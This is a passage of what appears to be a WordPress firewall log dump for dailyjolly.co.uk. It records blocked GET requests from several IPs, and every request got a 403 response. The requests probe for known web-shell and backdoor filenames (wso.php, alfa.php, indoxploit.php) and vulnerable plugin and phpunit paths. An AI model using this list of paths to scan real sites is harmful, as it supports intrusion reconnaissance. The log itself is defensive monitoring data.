Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','UQfeDNmthun6bCKAaRr34ixW',0,1674059149.2859,285,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','UQJ5sgxKXRb7EmYc4jaOGuNW',0,1674059150.5102,422,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','xXoKQb9kpr3gdVwiT4Ey5sYW',0,1674059151.8533,280,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','JGkPsQFtL9qf4yRNoh8aUwZM',0,1674059153.0582,297,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','30piTAaYxlcGtJ2E8vgkMNUd',0,1674059154.2803,249,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','ZcLv5iUfFukMgq1leDKpjJA3',0,1674059155.4504,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/Lux.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','8e5sAt0GpcnofV2WhXkxZY7v',0,1674059156.5343,198,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','wI6fCsX3ObNHe9Ki4AraUmqL',0,1674059157.7164,290,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"python-requests\\/2.26.0\"}','CNJDQFlxPuB1OX2HVM3z9pmY',0,1674061175.6967,237,'','GET',403,0,700,0,1,'',0),('165.22.114.45',2769711661,'','https://dailyjolly.co.uk/wp-content/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko\\/20100101 Firefox\\/103.0\",\"2\":\"http:\\/\\/dailyjolly.co.uk\"}','jwDmdLAFyERvGp8oTnX5WYPr',0,1674062492.4667,212,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-includes/css/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','x1feXmiqTosrF5DRNtcghCku',0,1674063578.5472,252,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','0MgWOBRjSn5cLk6FzCAamqH2',0,1674063580.3199,180,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/upspy/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','QLGJegREAZxvl03kipzb9841',0,1674063582.2603,244,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/ubh/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','9gXI5eKBWdutAm8l4iFcpbQq',0,1674063583.5187,178,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php?cache','','{\"1\":\"python-requests\\/2.27.1\"}','4qbT2spkg1cJ0EiQZ7ouO538',0,1674063585.6759,168,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/xichang/x.php?xi','','{\"1\":\"python-requests\\/2.27.1\"}','xfB4IFug281bQ5kMDGATVUcm',0,1674063587.5507,175,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-admin/shapes.php','','{\"1\":\"python-requests\\/2.27.1\"}','V3hwpBUPc1De7J9WfQnZMuXl',0,1674063590.7442,164,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','ft0De4WY8amMU2wIHoGKQyTv',0,1674063591.9110,206,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','RMqO9kam7x2eAzQdvc5fh38I',0,1674063593.0405,191,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','9U3iBO62KTtqQzCLo1xWlAaV',0,1674063595.4410,185,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','HFKoCQYlNy1rAb4LpvXf2Rdh',0,1674063596.6937,165,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','7pkYEmPn8sg1r53XVh0TqBSH',0,1674063600.7628,180,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-admin/network/wp-footer.php','','{\"1\":\"python-requests\\/2.27.1\"}','uJyntzwcBr46x9FjY0KAev5E',0,1674063602.3064,184,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-info.php','','{\"1\":\"python-requests\\/2.27.1\"}','ZScK3s5m6lx4pzndu7L1fCvW',0,1674063603.5721,169,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','YygfKHlAGNrznPqjtV7sCwxp',0,1674063604.7988,194,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/upel.php','','{\"1\":\"python-requests\\/2.27.1\"}','r6xnjBp3MSaHzAIbKRlUmVJL',0,1674063605.9876,166,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/ppus/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','tXki7jYgdp6rSmLKZHBGDvwo',0,1674063607.2174,165,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/098.php','','{\"1\":\"python-requests\\/2.27.1\"}','RGlYb0PxFtwTNoKfJuCjrkQ1',0,1674063608.6697,332,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','JmlZbTn7QOqVGy60gHjNkM9F',0,1674063610.3286,175,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/new_license.php','','{\"1\":\"python-requests\\/2.27.1\"}','MluLBfeVd0NSw4DmQctE89qR',0,1674063611.4500,203,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','WCBlpJNQeDF3mRjZ5s0yAVoq',0,1674063612.5962,161,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','LT9pQZblMztFsBOXDJdo6Ix2',0,1674063614.5549,202,'','GET',403,0,700,0,1,'',0),('165.22.114.45',2769711661,'','https://dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko\\/20100101 Firefox\\/107.0\",\"2\":\"http:\\/\\/dailyjolly.co.uk\"}','kuHf7xpY82olvBUqKzN3A9Ea',0,1674065567.7010,211,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.27.1\"}','MqC0RiamePjOSIdgwWrVK5zD',0,1674073524.4629,259,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-includes/css/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','cewt1QAyY7piN6MlKGjLqgO8',0,1674079008.0444,286,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','Cs5GdI6EFNgZiO8kYe2vBDfh',0,1674079009.4420,238,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/upspy/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','JXC75kTbAceDxZlr2tIQUz9o',0,1674079010.8798,383,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/ubh/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','PoEwIeJuCU2bhxHzQ0Kpk34A',0,1674079012.7124,200,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php?cache','','{\"1\":\"python-requests\\/2.27.1\"}','e6QqkYvJ32Vaoh9Cdj7NtHfP',0,1674079013.8272,217,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/xichang/x.php?xi','','{\"1\":\"python-requests\\/2.27.1\"}','OTwzEaG9HfAhjJy2nq0XviPI',0,1674079015.2841,176,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-admin/shapes.php','','{\"1\":\"python-requests\\/2.27.1\"}','9y3fGxjpAdX2lYQSZI5suPBe',0,1674079017.9514,163,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','LXFxn9S4fKR6j3O0MEBlPoId',0,1674079019.0137,181,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','gmrfyNkHOpju0v15IeSnbhdR',0,1674079020.2207,169,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','Ir2L7Y6nkTHvMd31zK8NZ4hE',0,1674079022.7289,202,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','gSetqKavQimOfCMYJxkA150E',0,1674079023.9360,212,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','StTCK9Fpbzr4cLZB7PaWXGhi',0,1674079027.3302,199,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-admin/network/wp-footer.php','','{\"1\":\"python-requests\\/2.27.1\"}','EreTyDSRQ69pCkYnzwW2dINt',0,1674079028.8644,191,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-info.php','','{\"1\":\"python-requests\\/2.27.1\"}','3LgEtuQdBSqHNlCoAa2zfX4h',0,1674079030.3726,166,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','mUtpYZ6IeanGBNS058HADiso',0,1674079031.4437,192,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/upel.php','','{\"1\":\"python-requests\\/2.27.1\"}','3oxeXYpVbtR9Dzr28L1Smv6B',0,1674079033.4244,196,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/ppus/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','TVFipmqZCghvO4ASY8kso7PM',0,1674079034.5535,190,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/098.php','','{\"1\":\"python-requests\\/2.27.1\"}','YVeuNWB4lOvQIfptsijGqbFR',0,1674079035.6475,201,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','B5AqpdJG74lFeEV1xC6YwasQ',0,1674079036.8685,162,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/new_license.php','','{\"1\":\"python-requests\\/2.27.1\"}','FRNHWpuMlDEZ7A6hCtQrysL0',0,1674079037.9572,172,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','BA6u7QK2CFapXWks5jTI39zx',0,1674079039.0338,165,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','QBXW4lZsvtjkMf7TaVr5eUgi',0,1674079040.0976,202,'','GET',403,0,700,0,1,'',0),('109.248.175.119',1845014391,'','https://www.dailyjolly.co.uk/wso112233.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','zE7iZIwBg2FG8DedrvlcVSkA',0,1674083048.2155,1166,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','vQW5rY9hAogH2c47y3L1xiVz',0,1674085147.4357,1023,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','ScFx4JOZ3m1NbsHd5UnaKXDV',0,1674085151.8501,566,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','9MWxRYInOKLQct50jh4DEXF7',0,1674085153.2398,708,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','YEwvIxUV5qDChWXO68Kso2GS',0,1674085159.8107,830,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-content/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','LpdHm2FAVKjzvUgqn04Qb5y3',0,1674085160.9089,485,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','2SAsQHLlkocNUfdX5ajn8VmC',0,1674085163.9706,510,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','HNoPpt7ci0Ajm69K5qeB8EJy',0,1674085165.3511,605,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','4Jw2pIBtfCqb851XMdmVsgio',0,1674085166.2314,407,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','Uc6QzKZ7928Lp5GkSyjWBd4O',0,1674085167.4413,1117,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','FzwB0kDJm6f1TqheO8CNXLc5',0,1674085169.3603,749,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','DTAlgCqr6kM7fYLREFS4jBcz',0,1674085181.7168,1157,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','ZRHTA6YSOMnKQrxw9pWcfXbd',0,1674085188.5404,1211,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','Dce5EOmBrRAxJWQhy3t6NF2k',0,1674085190.5702,580,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/about.php','','{\"1\":\"python-requests\\/2.26.0\"}','PUV34t0g6mxLW8sfBocjiKIA',0,1674085699.3544,1419,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/3index.php','','{\"1\":\"python-requests\\/2.26.0\"}','ydL5iqTb0PQMf7CUErnHpVNa',0,1674085701.5765,1433,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/2index.php','','{\"1\":\"python-requests\\/2.26.0\"}','9M0bl1NTn6K7Q8a5pDm2dwHG',0,1674085703.7751,715,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/C.php','','{\"1\":\"python-requests\\/2.26.0\"}','uvolZUmaing8jhsXEq4Yy6tS',0,1674085705.4502,1759,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/c.php','','{\"1\":\"python-requests\\/2.26.0\"}','lw2JC5KkXnS9WqPxcTyYrQuh',0,1674085707.9762,1769,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/01.php','','{\"1\":\"python-requests\\/2.26.0\"}','YnXpCb8LlIcdmWfV1oTAZRgD',0,1674085710.5782,1267,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/1.php','','{\"1\":\"python-requests\\/2.26.0\"}','sAti1jp2cuCYxfMgkIUT8NvG',0,1674085712.6263,1475,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/02.php','','{\"1\":\"python-requests\\/2.26.0\"}','Y0UGm6ucwznTikFAHRXtaKv2',0,1674085714.8685,1497,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/2.php','','{\"1\":\"python-requests\\/2.26.0\"}','3mJ8qhlO5XBF2yoAiE1Cd7gs',0,1674085717.1623,1907,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/fw.php','','{\"1\":\"python-requests\\/2.26.0\"}','Yu7EeCmOcbVrg8oT1xsqB4Fi',0,1674085719.8445,1339,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/alfa.php','','{\"1\":\"python-requests\\/2.26.0\"}','br6VJSLeP0iDdoYmGhv35X7w',0,1674085721.9821,1011,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/mini.php','','{\"1\":\"python-requests\\/2.26.0\"}','nEZpTBPrd58tkN7iVKQgq2yR',0,1674085723.7744,1500,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"python-requests\\/2.26.0\"}','pqbwnRPda9A1gt8UOYSN05xc',0,1674085726.0683,865,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/404.php','','{\"1\":\"python-requests\\/2.26.0\"}','gt67cL0XY3asJDVp4HkGQA18',0,1674085727.7184,1106,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/403.php','','{\"1\":\"python-requests\\/2.26.0\"}','osYqDCU1GpjrulA5ni9ZQJTv',0,1674085729.6577,1415,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.26.0\"}','NayG0tsJgbSZBkoTn1FxvKer',0,1674085731.8600,1323,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/admin.php','','{\"1\":\"python-requests\\/2.26.0\"}','kbB5cw6jSutoWqNLGIvHQfFa',0,1674085733.9570,1209,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/wp-22.php','','{\"1\":\"python-requests\\/2.26.0\"}','unQPTJZpMlF5OsL74fzcSN69',0,1674085736.0745,1358,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"python-requests\\/2.26.0\"}','RyEscAiF5Gq710X8BKLrtYwn',0,1674085738.2571,1417,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/marijuana.php','','{\"1\":\"python-requests\\/2.26.0\"}','KMxU3VkI56GtbrqcwLTJ8f91',0,1674085740.4589,1047,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/good.php','','{\"1\":\"python-requests\\/2.26.0\"}','g43FuSK2Px5wo8D6Wz1nOTJI',0,1674085742.2981,1485,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/classes.php','','{\"1\":\"python-requests\\/2.26.0\"}','0QOaT68S1Irvw4XtxYBE2Wlg',0,1674085744.5902,1255,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/doc.php','','{\"1\":\"python-requests\\/2.26.0\"}','UYqTftrxoQlG03RKPVsD97j1',0,1674085746.6128,1162,'','GET',403,0,700,0,1,'',0),('135.181.141.142',2276822414,'','https://dailyjolly.co.uk/wp-commentin.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','951GIoj8DnpbBmRkhV2dcTN4',0,1674091266.8193,282,'','GET',403,0,700,0,1,'',0),('188.241.82.13',3169931789,'','https://www.dailyjolly.co.uk/wp-content/_input_3_raiz0.php5','','{\"1\":\"python-requests\\/2.23.0\"}','L5VoScRdIWEpNt2lBreTxuk4',0,1674094343.9003,324,'','GET',403,0,700,0,1,'',0),('188.241.82.13',3169931789,'','https://www.dailyjolly.co.uk/wp-content/plugins/revslider/temp/update_extract/Raiz0__fudmv.php','','{\"1\":\"python-requests\\/2.23.0\"}','ziEONBCV4vMtRTcfuA5Yb7gh',0,1674094363.7326,304,'','GET',403,0,700,0,1,'',0),('188.241.82.13',3169931789,'','https://www.dailyjolly.co.uk/wp-content/plugins/showbiz/temp/update_extract/Raiz0__fudmv.php','','{\"1\":\"python-requests\\/2.23.0\"}','KZtGsWO62h0J4VIYiC9SdcB1',0,1674094375.6137,340,'','GET',403,0,700,0,1,'',0),('188.241.82.13',3169931789,'','https://www.dailyjolly.co.uk/XxX.php?XxX','','{\"1\":\"python-requests\\/2.23.0\"}','51zifTSoMgrtuvPWd6Hy2LFI',0,1674094408.6509,450,'','GET',403,0,700,0,1,'',0),('188.241.82.13',3169931789,'','https://www.dailyjolly.co.uk/components/Raiz0WorM_1674092839.php','','{\"1\":\"python-requests\\/2.23.0\"}','lf8IJx54F0wAhGkuNM7bztjX',0,1674094443.4822,241,'','GET',403,0,700,0,1,'',0),('188.241.82.13',3169931789,'','https://www.dailyjolly.co.uk/wp-content/uploads/assignments/Raiz0_1674092839.php.','','{\"1\":\"python-requests\\/2.23.0\"}','JTtQOy1UKerW0D2fNH7pmzlR',0,1674094468.7518,294,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8OWZAT7Rot5LYBVJr0yzfnX1',0,1674094889.5665,23920,'','GET',403,0,700,0,1,'',0),('135.181.141.142',2276822414,'','https://dailyjolly.co.uk/wso112233.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0hYO9VwP6nN5lopuT8C3iGrz',0,1674100052.9743,727,'','GET',403,0,700,0,1,'',0),('135.181.141.142',2276822414,'','https://dailyjolly.co.uk/.wp-back.phP','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','M2ZHmYXcjEwlNTGRp8Whq1uA',0,1674100054.0276,393,'','GET',403,0,700,0,1,'',0),('135.181.141.142',2276822414,'','https://dailyjolly.co.uk/bala.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tUhB1kJe0cbarCKixsV7DpQY',0,1674100054.6708,321,'','GET',403,0,700,0,1,'',0),('135.181.141.142',2276822414,'','https://dailyjolly.co.uk/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 